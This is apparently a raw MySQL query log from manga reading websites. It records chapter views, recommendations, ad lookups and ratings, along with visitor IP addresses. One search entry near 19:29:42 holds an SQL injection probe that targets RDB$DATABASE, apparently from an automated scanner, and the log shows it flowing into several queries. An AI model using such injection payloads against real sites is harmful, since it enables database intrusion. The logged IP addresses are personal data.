Update chapters set view=view+1 where id = '11900' 330654866 Quit 330654867 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654867 Query select * FROM chapters where id = '11900' 330654867 Quit 330654868 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654868 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '11900' 330654868 Quit 330654869 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654869 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('22', '11900', '89.212.116.230', 'mangacherri.com', '2026-02-26 03:29:38', '2026-02-26 03:29:38') 330654869 Quit 330654870 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654870 Query select * FROM chapter_images where chapter_id = '11900' 330654870 Quit 330654871 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654871 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '22' and m.active = 1 330654871 Quit 330654872 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654872 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='22' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 260225 19:29:39 330654873 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654874 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654873 Quit 330654874 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17513' 330654874 Quit 330654875 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654875 Query select * FROM chapters where id = '17513' 330654875 Quit 330654876 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654876 Query select * FROM chapters where manga_id = '197' order by id desc 330654876 Quit 330654877 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654877 Query Update chapters set view=view+1 where id = '17513' 330654877 Quit 330654878 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654878 Query select * FROM chapters where id = '17513' 330654879 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654879 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17513' 330654878 Quit 330654879 Quit 330654880 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654880 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('197', '17513', '2001:fb1:48:6661:8d81:4bcf:2330:c846', 'mangacherri.com', '2026-02-26 03:29:39', '2026-02-26 03:29:39') 330654880 Quit 330654881 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654881 Query select * FROM chapter_images where chapter_id = '17513' 330654881 Quit 330654882 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654882 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '197' and m.active = 1 330654882 Quit 330654883 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654883 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='197' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 330654872 Quit 330654884 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654885 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654884 Quit 330654885 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330654885 Quit 330654886 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654887 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654886 Quit 330654887 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654887 Quit 330654888 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654889 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654888 Quit 330654889 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654889 Quit 330654890 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654891 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654890 Quit 330654891 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654891 Quit 330654892 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654893 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654892 Quit 330654893 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '9554' and m.active = 1 330654893 Quit 330654894 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654894 Query select * FROM chapters where id = '9554' 330654894 Quit 330654895 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654895 Query select * FROM chapters where manga_id = '123' order by display_priority ASC, id desc 330654895 Quit 330654896 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654896 Query Update chapters set view=view+1 where id = '9554' 330654896 Quit 330654897 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654897 Query select * FROM chapters where id = '9554' 330654898 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654898 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '9554' and m.active = 1 330654897 Quit 330654898 Quit 330654899 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654899 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('123', '9554', '35.149.113.156', 'mangaberri.com', '2026-02-26 03:29:39', '2026-02-26 03:29:39') 330654899 Quit 330654900 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654900 Query select * FROM chapter_images where chapter_id = '9554' 330654900 Quit 330654901 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654901 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '123' and m.active = 1 330654901 Quit 330654902 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654902 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='123' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Fantasy%' OR genres like '%Manhwa/Manhua%') ORDER BY RAND() limit 10 330654902 Quit 330654903 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654904 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654904 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330654903 Quit 330654904 Quit 330654905 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654906 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654905 Quit 330654906 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654906 Quit 330654907 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654908 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654908 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654908 Quit 330654909 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654910 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654907 Quit 330654909 Quit 330654910 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654910 Quit 330654883 Quit 330654911 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654912 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654911 Quit 330654912 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330654912 Quit 330654913 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654914 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654913 Quit 330654914 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654914 Quit 330654915 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654916 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654915 Quit 330654916 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654916 Quit 330654917 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654918 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654918 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654917 Quit 330654918 Quit 260225 19:29:40 330654919 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654920 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654919 Quit 330654920 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '11389' 330654920 Quit 330654921 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654921 Query select * FROM chapters where id = '11389' 330654921 Quit 330654922 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654922 Query select * FROM chapters where manga_id = '214' order by id desc 330654922 Quit 330654923 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654923 Query Update chapters set view=view+1 where id = '11389' 330654923 Quit 330654924 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654924 Query select * FROM chapters where id = '11389' 330654924 Quit 330654925 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654925 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '11389' 330654925 Quit 330654926 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654926 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('214', '11389', '85.251.125.13', 'mangacherri.com', '2026-02-26 03:29:40', '2026-02-26 03:29:40') 330654926 Quit 330654927 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654927 Query select * FROM chapter_images where chapter_id = '11389' 330654927 Quit 330654928 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654928 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '214' and m.active = 1 330654928 Quit 330654929 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654929 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='214' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Gyaru%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 330654930 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654931 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654930 Quit 330654931 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '16866' 330654931 Quit 330654932 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654932 Query select * FROM chapters where id = '16866' 330654932 Quit 330654933 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654933 Query select * FROM chapters where manga_id = '338' order by id desc 330654933 Quit 330654934 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654934 Query Update chapters set view=view+1 where id = '16866' 330654934 Quit 330654935 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654935 Query select * FROM chapters where id = '16866' 330654935 Quit 330654936 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654936 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '16866' 330654936 Quit 330654937 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654937 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('338', '16866', '171.5.230.114', 'mangacherri.com', '2026-02-26 03:29:40', '2026-02-26 03:29:40') 330654937 Quit 330654938 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654938 Query select * FROM chapter_images where chapter_id = '16866' 330654938 Quit 330654939 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654939 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '338' and m.active = 1 330654940 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654940 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='338' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Gyaru%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330654939 Quit 330654929 Quit 330654941 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654942 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654941 Quit 330654942 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330654942 Quit 330654943 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654944 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654943 Quit 330654944 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654944 Quit 330654945 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654946 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654945 Quit 330654946 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654946 Quit 330654947 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654948 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654948 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654947 Quit 330654948 Quit 330654940 Quit 330654949 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654950 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654949 Quit 330654950 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330654950 Quit 330654951 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654952 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654951 Quit 330654952 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654952 Quit 330654953 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654954 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654953 Quit 330654954 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654954 Quit 330654955 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654956 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654955 Quit 330654956 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654956 Quit 260225 19:29:42 330654957 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654958 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654957 Quit 330654958 Query INSERT INTO search_keywords (keyword, ip, created) VALUES ('1And//2367(2727(seLECt//CASE//2367//When//2367//THEN//1//elSe//0//eND//fRom//RDBdAtabASe)2727) OR ng', '169.150.196.30', '2026-02-26 03:29:42') 330654958 Quit 330654959 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654959 Query SELECT m.*, c.name AS latest_chapter, c.id AS latest_chapter_id FROM mangas m JOIN ( SELECT manga_id, MAX(id) AS latest_chapter_id FROM chapters GROUP BY manga_id ) lc ON lc.manga_id = m.id JOIN chapters c ON c.id = lc.latest_chapter_id WHERE ( m.title LIKE '%1And//2367(2727(seLECt//CASE//2367//When//2367//THEN//1//elSe//0//eND//fRom//RDBdAtabASe)2727) OR ng%' OR ( m.alternate_title IS NOT NULL AND m.alternate_title <> '' AND m.alternate_title LIKE '%1And//2367(2727(seLECt//CASE//2367//When//2367//THEN//1//elSe//0//eND//fRom//RDBdAtabASe)2727) OR ng%' ) ) 330654959 Quit 330654960 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654960 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = '1\'And/**/2367=(%27~%27||(seLECt/**/CASE/**/2367/**/When/**/2367/**/THEN/**/1/**/elSe/**/0/**/eND/**/fRom/**/RDB$dAtabASe)||%27~%27) OR \'ngmezUrf\'=\'L9ijypUU' 330654960 Quit 330654961 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654961 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%%') group by manga_id ORDER BY sum(view) DESC 330654961 Quit 330654962 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654963 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654963 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330654962 Quit 330654963 Quit 330654964 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654964 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330654964 Quit 330654965 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654965 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330654965 Quit 330654966 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654966 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330654966 Quit 330654967 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654967 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330654967 Quit 330654968 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654968 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330654968 Quit 330654969 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654969 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330654969 Quit 330654970 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654970 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330654970 Quit 330654971 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654971 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330654971 Quit 330654972 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654972 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330654972 Quit 330654973 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654973 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330654973 Quit 330654974 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654974 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330654974 Quit 330654975 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654975 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330654975 Quit 330654976 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654976 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330654976 Quit 330654977 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654977 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330654977 Quit 330654978 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654978 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330654978 Quit 330654979 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654979 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330654979 Quit 330654980 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654980 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330654980 Quit 330654981 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654981 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330654981 Quit 330654982 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654982 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330654982 Quit 330654983 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654983 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330654983 Quit 330654984 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654984 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330654984 Quit 330654985 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654985 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330654985 Quit 330654986 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654986 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330654986 Quit 330654987 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654987 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330654987 Quit 330654988 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654988 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330654988 Quit 330654989 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654989 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330654989 Quit 330654990 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654990 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330654990 Quit 330654991 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654991 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330654991 Quit 330654992 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654992 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330654992 Quit 330654993 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654993 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330654993 Quit 330654994 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654994 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330654994 Quit 330654995 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654995 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330654995 Quit 330654996 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654996 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330654996 Quit 330654997 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654997 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330654997 Quit 330654998 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654998 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330654998 Quit 330654999 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654999 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330654999 Quit 330655000 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655000 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330655000 Quit 330655001 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655001 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330655001 Quit 330655002 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655002 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330655002 Quit 330655003 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655003 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330655003 Quit 330655004 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655004 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330655004 Quit 330655005 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655005 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330655005 Quit 330655006 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655006 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330655006 Quit 330655007 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655007 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330655007 Quit 330655008 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655008 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330655008 Quit 330655009 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655009 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330655009 Quit 330655010 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655010 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330655010 Quit 330655011 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655011 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330655011 Quit 330655012 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655012 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330655012 Quit 330655013 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655013 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330655013 Quit 330655014 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655014 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330655014 Quit 330655015 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655015 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330655015 Quit 330655016 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655016 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings 